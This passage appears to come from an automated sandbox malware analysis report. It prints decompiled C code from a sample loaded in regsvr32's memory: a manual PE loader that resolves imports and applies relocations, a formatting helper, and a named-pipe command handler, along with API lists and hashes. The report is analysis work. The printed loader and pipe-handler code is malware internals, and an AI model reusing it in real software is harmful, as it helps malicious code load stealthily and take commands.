                                                                                                                                                                                              0x0499de46
                                                                                                                                                                                              0x0499de4c
                                                                                                                                                                                              0x0499de4f
                                                                                                                                                                                              0x0499de51
                                                                                                                                                                                              0x0499de56
                                                                                                                                                                                              0x0499df2e
                                                                                                                                                                                              0x0499df2e
                                                                                                                                                                                              0x0499df2e
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x0499de5c
                                                                                                                                                                                              0x0499de5c
                                                                                                                                                                                              0x0499de5c
                                                                                                                                                                                              0x0499de5f
                                                                                                                                                                                              0x0499de65
                                                                                                                                                                                              0x0499de81
                                                                                                                                                                                              0x0499de88
                                                                                                                                                                                              0x0499de8e
                                                                                                                                                                                              0x0499de92
                                                                                                                                                                                              0x0499dea6
                                                                                                                                                                                              0x0499dea6
                                                                                                                                                                                              0x0499dea9
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x0499de94
                                                                                                                                                                                              0x0499de94
                                                                                                                                                                                              0x0499de99
                                                                                                                                                                                              0x0499de9d
                                                                                                                                                                                              0x0499de9d
                                                                                                                                                                                              0x0499dea1
                                                                                                                                                                                              0x0499dea2
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x0499de94
                                                                                                                                                                                              0x0499deaa
                                                                                                                                                                                              0x0499deaa
                                                                                                                                                                                              0x0499dead
                                                                                                                                                                                              0x0499deae
                                                                                                                                                                                              0x0499deb5
                                                                                                                                                                                              0x0499debf
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x0499dec1
                                                                                                                                                                                              0x0499dec7
                                                                                                                                                                                              0x0499decb
                                                                                                                                                                                              0x0499df24
                                                                                                                                                                                              0x0499ded4
                                                                                                                                                                                              0x0499dee1
                                                                                                                                                                                              0x0499dee7
                                                                                                                                                                                              0x0499dee9
                                                                                                                                                                                              0x0499def0
                                                                                                                                                                                              0x0499def6
                                                                                                                                                                                              0x0499defe
                                                                                                                                                                                              0x0499df06
                                                                                                                                                                                              0x0499df12
                                                                                                                                                                                              0x0499df18
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x0499df2a
                                                                                                                                                                                              0x0499deb7
                                                                                                                                                                                              0x00000000

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetCommandLineW.KERNEL32 ref: 0499DE3B
                                                                                                                                                                                              • CommandLineToArgvW.SHELL32(00000000,00000000), ref: 0499DE46
                                                                                                                                                                                              • lstrlenW.KERNEL32 ref: 0499DE88
                                                                                                                                                                                              • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 0499DEE1
                                                                                                                                                                                              • lstrcpynW.KERNEL32(?,00000000,00000104), ref: 0499DF06
                                                                                                                                                                                              • lstrcpynW.KERNEL32(?,?,00000104), ref: 0499DF24
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001B.00000002.673715833.0000000004990000.00000040.00001000.00020000.00000000.sdmp, Offset: 04990000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_27_2_4990000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CommandLinelstrcpyn$ArgvCurrentDirectorylstrlen
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1259063344-0
                                                                                                                                                                                              • Opcode ID: fde7620f1f07021c4ccd27f5454516018550d2d006de92764c4441b9c63ae7a4
                                                                                                                                                                                              • Instruction ID: 01b85317874807737f539367fd7849cb9396d5dd69e8356b616d629654e0253a
                                                                                                                                                                                              • Opcode Fuzzy Hash: fde7620f1f07021c4ccd27f5454516018550d2d006de92764c4441b9c63ae7a4
                                                                                                                                                                                              • Instruction Fuzzy Hash: 4631D271D00117ABEF24AF9CC8C8AAEB7F9EF56351F104A79E406E6054E774AD90CB50
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 0499E656 Relevance: 9.1, APIs: 6, Instructions: 87memoryCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • SysAllocString.OLEAUT32(00000000), ref: 0499E66A
                                                                                                                                                                                              • SysAllocString.OLEAUT32(?), ref: 0499E672
                                                                                                                                                                                              • SysAllocString.OLEAUT32(00000000), ref: 0499E686
                                                                                                                                                                                              • SysFreeString.OLEAUT32(?), ref: 0499E701
                                                                                                                                                                                              • SysFreeString.OLEAUT32(?), ref: 0499E704
                                                                                                                                                                                              • SysFreeString.OLEAUT32(?), ref: 0499E709
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001B.00000002.673715833.0000000004990000.00000040.00001000.00020000.00000000.sdmp, Offset: 04990000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_27_2_4990000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: String$AllocFree
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 344208780-0
                                                                                                                                                                                              • Opcode ID: 893b920062f6815f07866980ea577ab3250dc43b6b639fd730f0c3504ee39e2b
                                                                                                                                                                                              • Instruction ID: 6af607a3d856117efcaac686383e5d5c06994455c5f4ac485c733a30aad31506
                                                                                                                                                                                              • Opcode Fuzzy Hash: 893b920062f6815f07866980ea577ab3250dc43b6b639fd730f0c3504ee39e2b
                                                                                                                                                                                              • Instruction Fuzzy Hash: 3B21CCB5900218BFDF04DFA9CC88DAEBBBDEF49654B104469F505A7250DA71AE01DBA0
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 049A3D66 Relevance: 7.8, APIs: 5, Instructions: 322libraryloaderstringCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              C-Code - Quality: 20%
                                                                                                                                                                                              			E049A3D66(intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, CHAR* _a16, intOrPtr _a20) {
				signed int _v5;
				signed short _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				signed int* _v24;
				unsigned int _v28;
				signed short* _v32;
				struct HINSTANCE__* _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr* _v48;
				signed short* _v52;
				intOrPtr _v56;
				unsigned int _v60;
				intOrPtr _v64;
				_Unknown_base(*)()* _v68;
				signed int _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				unsigned int _v88;
				intOrPtr _v92;
				signed int _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				CHAR* _v116;
				signed int _v120;
				intOrPtr _v124;
				signed int _v128;
				signed int _v132;
				signed int _t216;
				signed int _t233;
				void* _t273;
				signed int _t278;
				signed int _t280;
				intOrPtr _t320;

				_v44 = _v44 & 0x00000000;
				_v84 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
				_v20 = _v84;
				_t320 = _a4 -  *((intOrPtr*)(_v20 + 0x34));
				_v64 = _t320;
				if(_t320 == 0) {
					L13:
					while(0 != 0) {
					}
					_push(8);
					if( *((intOrPtr*)(_v20 + 0xbadc25)) == 0) {
						L35:
						if(_a16 == 0) {
							L54:
							_v80 =  *((intOrPtr*)(_v20 + 0x28)) + _a4;
							while(0 != 0) {
							}
							if(_a12 != 0) {
								 *_a12 = _v80;
							}
							 *((intOrPtr*)(_v20 + 0x34)) = _a4;
							_v124 = _v80(_a4, 1, _a8);
							while(0 != 0) {
							}
							if(_v124 != 0) {
								if(_v44 == 0) {
									L77:
									return 1;
								}
								if(_a20 != 1) {
									if(_a20 != 2) {
										L75:
										while(0 != 0) {
										}
										goto L77;
									}
									while(0 != 0) {
									}
									_v132 = _v44;
									goto L75;
								}
								while(0 != 0) {
								}
								_v44();
								goto L75;
							}
							while(0 != 0) {
							}
							return 0;
						}
						while(0 != 0) {
						}
						_push(8);
						if( *((intOrPtr*)(_v20 + 0x78)) == 0) {
							goto L54;
						}
						_v128 = 0x80000000;
						_t216 = 8;
						_v76 = _a4 +  *((intOrPtr*)(_v20 + 0x78 + _t216 * 0));
						_v108 = _a4 +  *((intOrPtr*)(_v76 + 0x20));
						_v112 = _a4 +  *((intOrPtr*)(_v76 + 0x1c));
						_v104 =  *((intOrPtr*)(_v76 + 0x18));
						while(0 != 0) {
						}
						_v40 = _v40 & 0x00000000;
						while(_v40 < _v104) {
							_v116 = _a4 +  *((intOrPtr*)(_v108 + _v40 * 4));
							_v120 = _a4 +  *((intOrPtr*)(_v112 + _v40 * 4));
							if(lstrcmpA(_v116, _a16) != 0) {
								_v40 = _v40 + 1;
								continue;
							}
							while(0 != 0) {
							}
							_v44 = _v120;
							break;
						}
						if(_v44 != 0) {
							goto L54;
						}
						while(0 != 0) {
						}
						return 0xffffffff;
					}
					_v96 = 0x80000000;
					_t233 = 8;
					_v16 = _a4 +  *((intOrPtr*)(_v20 + (_t233 << 0) + 0x78));
					while( *((intOrPtr*)(_v16 + 0xc)) != 0) {
						_v36 = GetModuleHandleA( *((intOrPtr*)(_v16 + 0xc)) + _a4);
						if(_v36 == 0) {
							_v36 = LoadLibraryA( *((intOrPtr*)(_v16 + 0xc)) + _a4);
						}
						if(_v36 != 0) {
							if( *_v16 == 0) {
								_v24 =  *((intOrPtr*)(_v16 + 0x10)) + _a4;
							} else {
								_v24 =  *_v16 + _a4;
							}
							_v72 = _v72 & 0x00000000;
							while( *_v24 != 0) {
								if(( *_v24 & _v96) == 0) {
									_v100 =  *_v24 + _a4;
									_v68 = GetProcAddress(_v36, _v100 + 2);
								} else {
									_v68 = GetProcAddress(_v36,  *_v24 & 0x0000ffff);
								}
								if( *((intOrPtr*)(_v16 + 0x10)) == 0) {
									 *_v24 = _v68;
								} else {
									 *( *((intOrPtr*)(_v16 + 0x10)) + _a4 + _v72) = _v68;
								}
								_v24 =  &(_v24[1]);
								_v72 = _v72 + 4;
							}
							_v16 = _v16 + 0x14;
							continue;
						} else {
							_t273 = 0xfffffffd;
							return _t273;
						}
					}
					goto L35;
				}
				_t278 = 8;
				_v52 = _a4 +  *((intOrPtr*)(_v20 + 0x78 + _t278 * 5));
				_t280 = 8;
				_v56 =  *((intOrPtr*)(_v20 + 0x7c + _t280 * 5));
				while(0 != 0) {
				}
				while(_v56 > 0) {
					_v28 = _v52[2];
					_v56 = _v56 - _v28;
					_v28 = _v28 - 8;
					_v28 = _v28 >> 1;
					_v32 =  &(_v52[4]);
					_v92 = _a4 +  *_v52;
					_v60 = _v28;
					while(1) {
						_v88 = _v60;
						_v60 = _v60 - 1;
						if(_v88 == 0) {
							break;
						}
						_v5 = ( *_v32 & 0x0000ffff) >> 0xc;
						_v12 =  *_v32 & 0xfff;
						_v48 = (_v12 & 0x0000ffff) + _v92;
						if((_v5 & 0x000000ff) != 3) {
							if((_v5 & 0x000000ff) == 0xa) {
								 *_v48 =  *_v48 + _v64;
							}
						} else {
							 *_v48 =  *_v48 + _v64;
						}
						_v32 =  &(_v32[1]);
					}
					_v52 = _v32;
				}
				goto L13;
			}









































                                                                                                                                                                                              0x049a3d6f
                                                                                                                                                                                              0x049a3d7c
                                                                                                                                                                                              0x049a3d82
                                                                                                                                                                                              0x049a3d8b
                                                                                                                                                                                              0x049a3d8e
                                                                                                                                                                                              0x049a3d91
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x049a3e82
                                                                                                                                                                                              0x049a3e86
                                                                                                                                                                                              0x049a3e88
                                                                                                                                                                                              0x049a3e96
                                                                                                                                                                                              0x049a3fb4
                                                                                                                                                                                              0x049a3fb8
                                                                                                                                                                                              0x049a407d
                                                                                                                                                                                              0x049a4086
                                                                                                                                                                                              0x049a4089
                                                                                                                                                                                              0x049a408d
                                                                                                                                                                                              0x049a4093
                                                                                                                                                                                              0x049a409b
                                                                                                                                                                                              0x049a409b
                                                                                                                                                                                              0x049a40a3
                                                                                                                                                                                              0x049a40b1
                                                                                                                                                                                              0x049a40b4
                                                                                                                                                                                              0x049a40b8
                                                                                                                                                                                              0x049a40be
                                                                                                                                                                                              0x049a40ce
                                                                                                                                                                                              0x049a40f9
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x049a40fb
                                                                                                                                                                                              0x049a40d4
                                                                                                                                                                                              0x049a40e5
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x049a40f3
                                                                                                                                                                                              0x049a40f7
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x049a40f3
                                                                                                                                                                                              0x049a40e7
                                                                                                                                                                                              0x049a40eb
                                                                                                                                                                                              0x049a40f0
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x049a40f0
                                                                                                                                                                                              0x049a40d6
                                                                                                                                                                                              0x049a40da
                                                                                                                                                                                              0x049a40dc
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x049a40dc
                                                                                                                                                                                              0x049a40c0
                                                                                                                                                                                              0x049a40c4
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x049a40c6
                                                                                                                                                                                              0x049a3fbe
                                                                                                                                                                                              0x049a3fc2
                                                                                                                                                                                              0x049a3fc4
                                                                                                                                                                                              0x049a3fd2
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x049a3fd8
                                                                                                                                                                                              0x049a3fe1
                                                                                                                                                                                              0x049a3fef
                                                                                                                                                                                              0x049a3ffb
                                                                                                                                                                                              0x049a4007
                                                                                                                                                                                              0x049a4010
                                                                                                                                                                                              0x049a4013
                                                                                                                                                                                              0x049a4017
                                                                                                                                                                                              0x049a4019
                                                                                                                                                                                              0x049a4026
                                                                                                                                                                                              0x049a403a
                                                                                                                                                                                              0x049a4049
                                                                                                                                                                                              0x049a405a
                                                                                                                                                                                              0x049a4023
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x049a4023
                                                                                                                                                                                              0x049a405c
                                                                                                                                                                                              0x049a4060
                                                                                                                                                                                              0x049a4065
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x049a4065
                                                                                                                                                                                              0x049a4070
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x049a4072
                                                                                                                                                                                              0x049a4076
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x049a4078
                                                                                                                                                                                              0x049a3e9c
                                                                                                                                                                                              0x049a3ea5
                                                                                                                                                                                              0x049a3eb3
                                                                                                                                                                                              0x049a3eb6
                                                                                                                                                                                              0x049a3ed3
                                                                                                                                                                                              0x049a3eda
                                                                                                                                                                                              0x049a3eec
                                                                                                                                                                                              0x049a3eec
                                                                                                                                                                                              0x049a3ef3
                                                                                                                                                                                              0x049a3f03
                                                                                                                                                                                              0x049a3f1b
                                                                                                                                                                                              0x049a3f05
                                                                                                                                                                                              0x049a3f0d
                                                                                                                                                                                              0x049a3f0d
                                                                                                                                                                                              0x049a3f1e
                                                                                                                                                                                              0x049a3f22
                                                                                                                                                                                              0x049a3f32
                                                                                                                                                                                              0x049a3f55
                                                                                                                                                                                              0x049a3f67
                                                                                                                                                                                              0x049a3f34
                                                                                                                                                                                              0x049a3f48
                                                                                                                                                                                              0x049a3f48
                                                                                                                                                                                              0x049a3f71
                                                                                                                                                                                              0x049a3f8d
                                                                                                                                                                                              0x049a3f73
                                                                                                                                                                                              0x049a3f82
                                                                                                                                                                                              0x049a3f82
                                                                                                                                                                                              0x049a3f95
                                                                                                                                                                                              0x049a3f9e
                                                                                                                                                                                              0x049a3f9e
                                                                                                                                                                                              0x049a3fac
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x049a3ef5
                                                                                                                                                                                              0x049a3ef7
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x049a3ef7
                                                                                                                                                                                              0x049a3ef3
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x049a3eb6
                                                                                                                                                                                              0x049a3d99
                                                                                                                                                                                              0x049a3da7
                                                                                                                                                                                              0x049a3dac
                                                                                                                                                                                              0x049a3db7
                                                                                                                                                                                              0x049a3dba
                                                                                                                                                                                              0x049a3dbe
                                                                                                                                                                                              0x049a3dc0
                                                                                                                                                                                              0x049a3dd0
                                                                                                                                                                                              0x049a3dd9
                                                                                                                                                                                              0x049a3de2
                                                                                                                                                                                              0x049a3dea
                                                                                                                                                                                              0x049a3df3
                                                                                                                                                                                              0x049a3dfe
                                                                                                                                                                                              0x049a3e04
                                                                                                                                                                                              0x049a3e07
                                                                                                                                                                                              0x049a3e0a
                                                                                                                                                                                              0x049a3e11
                                                                                                                                                                                              0x049a3e18
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x049a3e23
                                                                                                                                                                                              0x049a3e31
                                                                                                                                                                                              0x049a3e3c
                                                                                                                                                                                              0x049a3e46
                                                                                                                                                                                              0x049a3e5e
                                                                                                                                                                                              0x049a3e6b
                                                                                                                                                                                              0x049a3e6b
                                                                                                                                                                                              0x049a3e48
                                                                                                                                                                                              0x049a3e53
                                                                                                                                                                                              0x049a3e53
                                                                                                                                                                                              0x049a3e72
                                                                                                                                                                                              0x049a3e72
                                                                                                                                                                                              0x049a3e7a
                                                                                                                                                                                              0x049a3e7a
                                                                                                                                                                                              0x00000000

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(00000000), ref: 049A3ECD
                                                                                                                                                                                              • LoadLibraryA.KERNEL32(00000000), ref: 049A3EE6
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 049A3F42
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 049A3F61
                                                                                                                                                                                              • lstrcmpA.KERNEL32(?,00000000), ref: 049A4052
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001B.00000002.673715833.0000000004990000.00000040.00001000.00020000.00000000.sdmp, Offset: 04990000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_27_2_4990000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: AddressProc$HandleLibraryLoadModulelstrcmp
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1872726118-0
                                                                                                                                                                                              • Opcode ID: 5ee1e07c21797fa36c7f73c9e3ff67cabf5174fc9683a2492c5763deebfa10e7
                                                                                                                                                                                              • Instruction ID: da8e53a207a6668979d903dd4d44f5b4859a86ebdaaa2cb54134011f82db17e1
                                                                                                                                                                                              • Opcode Fuzzy Hash: 5ee1e07c21797fa36c7f73c9e3ff67cabf5174fc9683a2492c5763deebfa10e7
                                                                                                                                                                                              • Instruction Fuzzy Hash: A9E1CF74E00219DFDB24CFA8C984AADBBB5FF08314F148569E811EB391D770A9A1DB90
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 049A19A9 Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 158COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001B.00000002.673715833.0000000004990000.00000040.00001000.00020000.00000000.sdmp, Offset: 04990000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_27_2_4990000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID: @$\u%04X$\u%04X\u%04X
                                                                                                                                                                                              • API String ID: 0-2132903582
                                                                                                                                                                                              • Opcode ID: 8acb0c2731a6ec1b8b3e67a4dfa85e1473944c0cf4b11918675b597882270285
                                                                                                                                                                                              • Instruction ID: 7bee3dee265eca3e62a9fc43a9059bda5d494453ed70c43502f93e862461e286
                                                                                                                                                                                              • Opcode Fuzzy Hash: 8acb0c2731a6ec1b8b3e67a4dfa85e1473944c0cf4b11918675b597882270285
                                                                                                                                                                                              • Instruction Fuzzy Hash: 6641D275700205AFEB284EA8AD9FABE3A5EEF40354F180536F902A6244F261F97482D5
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 049A3379 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 85stringCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              C-Code - Quality: 83%
                                                                                                                                                                                              			E049A3379(void* __edi, char* _a4, intOrPtr _a8, long long _a12, signed int _a20) {
				signed int _t12;
				signed int _t13;
				signed int _t23;
				void* _t30;
				char* _t31;
				char* _t33;
				char* _t35;
				char* _t37;
				char* _t38;
				long long* _t40;

				_t30 = __edi;
				_t12 = _a20;
				if(_t12 == 0) {
					_t12 = 0x11;
				}
				_t35 = _a4;
				_push(_t25);
				 *_t40 = _a12;
				_push(_t12);
				_push("%.*g");
				_push(_a8);
				_push(_t35);
				L049A34D2();
				_t23 = _t12;
				if(_t23 < 0 || _t23 >= _a8) {
					L16:
					_t13 = _t12 | 0xffffffff;
					goto L17;
				} else {
					E049A3352(_t12, _t35);
					if(strchr(_t35, 0x2e) != 0 || strchr(_t35, 0x65) != 0) {
						L8:
						_push(_t30);
						_t37 = strchr(_t35, 0x65);
						_t31 = _t37;
						if(_t37 == 0) {
							L15:
							_t13 = _t23;
							L17:
							return _t13;
						}
						_t38 = _t37 + 1;
						_t33 = _t31 + 2;
						if( *_t38 == 0x2d) {
							_t38 = _t33;
						}
						while( *_t33 == 0x30) {
							_t33 = _t33 + 1;
						}
						if(_t33 != _t38) {
							E04998CE0(_t38, _t33, _t23 - _t33 + _a4);
							_t23 = _t23 + _t38 - _t33;
						}
						goto L15;
					} else {
						_t6 = _t23 + 3; // 0x49a1b64
						_t12 = _t6;
						if(_t12 >= _a8) {
							goto L16;
						}
						_t35[_t23] = 0x302e;
						( &(_t35[2]))[_t23] = 0;
						_t23 = _t23 + 2;
						goto L8;
					}
				}
			}













                                                                                                                                                                                              0x049a3379
                                                                                                                                                                                              0x049a337c
                                                                                                                                                                                              0x049a3381
                                                                                                                                                                                              0x049a3385
                                                                                                                                                                                              0x049a3385
                                                                                                                                                                                              0x049a338b
                                                                                                                                                                                              0x049a338f
                                                                                                                                                                                              0x049a3390
                                                                                                                                                                                              0x049a3393
                                                                                                                                                                                              0x049a3394
                                                                                                                                                                                              0x049a3399
                                                                                                                                                                                              0x049a339c
                                                                                                                                                                                              0x049a339d
                                                                                                                                                                                              0x049a33a2
                                                                                                                                                                                              0x049a33a9
                                                                                                                                                                                              0x049a3432
                                                                                                                                                                                              0x049a3432
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x049a33b4
                                                                                                                                                                                              0x049a33b5
                                                                                                                                                                                              0x049a33c7
                                                                                                                                                                                              0x049a33ed
                                                                                                                                                                                              0x049a33ed
                                                                                                                                                                                              0x049a33f6
                                                                                                                                                                                              0x049a33f8
                                                                                                                                                                                              0x049a33fe
                                                                                                                                                                                              0x049a342d
                                                                                                                                                                                              0x049a342d
                                                                                                                                                                                              0x049a3435
                                                                                                                                                                                              0x049a3438
                                                                                                                                                                                              0x049a3438
                                                                                                                                                                                              0x049a3400
                                                                                                                                                                                              0x049a3401
                                                                                                                                                                                              0x049a3407
                                                                                                                                                                                              0x049a3409
                                                                                                                                                                                              0x049a3409
                                                                                                                                                                                              0x049a340e
                                                                                                                                                                                              0x049a340d
                                                                                                                                                                                              0x049a340d
                                                                                                                                                                                              0x049a3415
                                                                                                                                                                                              0x049a3421
                                                                                                                                                                                              0x049a342b
                                                                                                                                                                                              0x049a342b
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x049a33d7
                                                                                                                                                                                              0x049a33d7
                                                                                                                                                                                              0x049a33d7
                                                                                                                                                                                              0x049a33dd
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x049a33df
                                                                                                                                                                                              0x049a33e5
                                                                                                                                                                                              0x049a33ea
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x049a33ea
                                                                                                                                                                                              0x049a33c7

                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001B.00000002.673715833.0000000004990000.00000040.00001000.00020000.00000000.sdmp, Offset: 04990000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_27_2_4990000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: strchr$_snprintf
                                                                                                                                                                                              • String ID: %.*g
                                                                                                                                                                                              • API String ID: 3619936089-952554281
                                                                                                                                                                                              • Opcode ID: 527ea1523dad494a2dde05e4543de59b59b2ce37c7bc0e69c35ed5844111f7ac
                                                                                                                                                                                              • Instruction ID: d74c445f67de5e2cf437740bed3e2d70354fa9ac3b903fbd71ecaa106aee0e31
                                                                                                                                                                                              • Opcode Fuzzy Hash: 527ea1523dad494a2dde05e4543de59b59b2ce37c7bc0e69c35ed5844111f7ac
                                                                                                                                                                                              • Instruction Fuzzy Hash: C8218762344B053BEB324E98EC81FAA3BCCAF42768F594034FC449A580EB60F97043D0
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 0499377F Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 306pipeCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              C-Code - Quality: 64%
                                                                                                                                                                                              			E0499377F(void* __fp0) {
				signed int _v144;
				signed int _v152;
				char _v160;
				char _v164;
				char _v168;
				signed int _v172;
				char _v176;
				intOrPtr _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				char _v200;
				signed int _v204;
				intOrPtr _t72;
				intOrPtr _t75;
				signed int _t80;
				signed int _t81;
				signed int _t84;
				signed int _t87;
				signed int _t88;
				signed int _t100;
				void* _t102;
				void* _t103;
				unsigned int* _t104;
				signed int _t110;
				signed int _t113;
				void* _t118;
				intOrPtr _t124;
				signed int _t127;
				intOrPtr _t129;
				intOrPtr _t132;
				void* _t133;
				void* _t137;
				signed int _t146;
				signed int _t148;
				signed short* _t149;
				signed int _t159;
				intOrPtr* _t183;
				void* _t187;
				void* _t188;
				void* _t189;
				signed short* _t192;
				void* _t196;
				signed int _t199;
				signed int _t200;
				signed int _t203;
				signed int _t204;
				char _t205;
				signed int _t206;
				void* _t208;
				void* _t214;
				void* _t221;

				_t221 = __fp0;
				_t208 = (_t206 & 0xfffffff8) - 0xac;
				_v144 = 0;
				_v172 = 0;
				while(1) {
					_t72 =  *0x49af818; // 0x4bdf8b0
					_push(0);
					_push( *0x49af804);
					_v152 = 0;
					if( *((intOrPtr*)(_t72 + 0xe0))() == 0 && GetLastError() != 0x217) {
						break;
					}
					_push(0);
					_push( &_v160);
					_t75 =  *0x49af818; // 0x4bdf8b0
					_push(0x80000);
					_push( *0x49af8bc);
					_push( *0x49af804);
					if( *((intOrPtr*)(_t75 + 0x90))() == 0 || _v180 == 0) {
						GetLastError();
						goto L56;
					} else {
						_t149 =  *0x49af8bc; // 0x0
						_t80 =  *_t149 & 0x0000ffff;
						_t214 = _t80 - 8;
						if(_t214 > 0) {
							_t81 = _t80 - 9;
							__eflags = _t81;
							if(_t81 == 0) {
								E049A0962( &_v200);
								L12:
								_t84 =  &_v200;
								L13:
								_push(4);
								L14:
								_push(_t84);
								_push(5);
								L31:
								_pop(_t187);
								E0499D1A6(_t187);
								L32:
								L56:
								DisconnectNamedPipe( *0x49af804);
								_push(0);
								_pop(0);
								if(_v172 == 0) {
									continue;
								}
								break;
							}
							_t87 = _t81;
							__eflags = _t87;
							if(_t87 == 0) {
								_v204 = 0;
								_t88 = E0499171A( &_v204, _t221);
								_v188 = _t88;
								__eflags = _t88;
								if(_t88 == 0) {
									_push(4);
									_v192 = 0;
									_push( &_v192);
									L19:
									_push(0xa);
									goto L31;
								}
								_t146 = _v204;
								_t90 = _t146 * 0x16;
								_v184 = _t146 * 0x16;
								_t203 = E04998BDE(_t90);
								_v192 = _t203;
								__eflags = _t203;
								if(_t203 == 0) {
									_t64 =  &_v192;
									 *_t64 = _v192 & 0x00000000;
									__eflags =  *_t64;
									_push(4);
									_push( &_v192);
									_t188 = 0xa;
									E0499D1A6(_t188);
									L52:
									E04998BF4( &_v188, _t146);
									goto L32;
								}
								_t199 = 0;
								__eflags = _t146;
								if(_t146 == 0) {
									L50:
									_push(E0499A43D(_t203));
									_push(_t203);
									_t189 = 5;
									E0499D1A6(_t189);
									E04998BF4( &_v192, 0xffffffff);
									_t208 = _t208 + 0x10;
									goto L52;
								}
								_t159 = _v188 + 4;
								__eflags = _t159;
								_v204 = _t159;
								do {
									__eflags = _t199;
									if(_t199 != 0) {
										__eflags = _t199 - _t146 - 1;
										if(_t199 < _t146 - 1) {
											_t102 = E0499A43D(_t203);
											_t159 = _v204;
											 *((short*)(_t102 + _t203)) = 0x3b;
										}
									}
									_t100 =  *_t159;
									_v196 = _t100;
									__eflags = _t100;
									if(_t100 != 0) {
										_t103 = E0499A43D(_t203);
										_t104 = _v204;
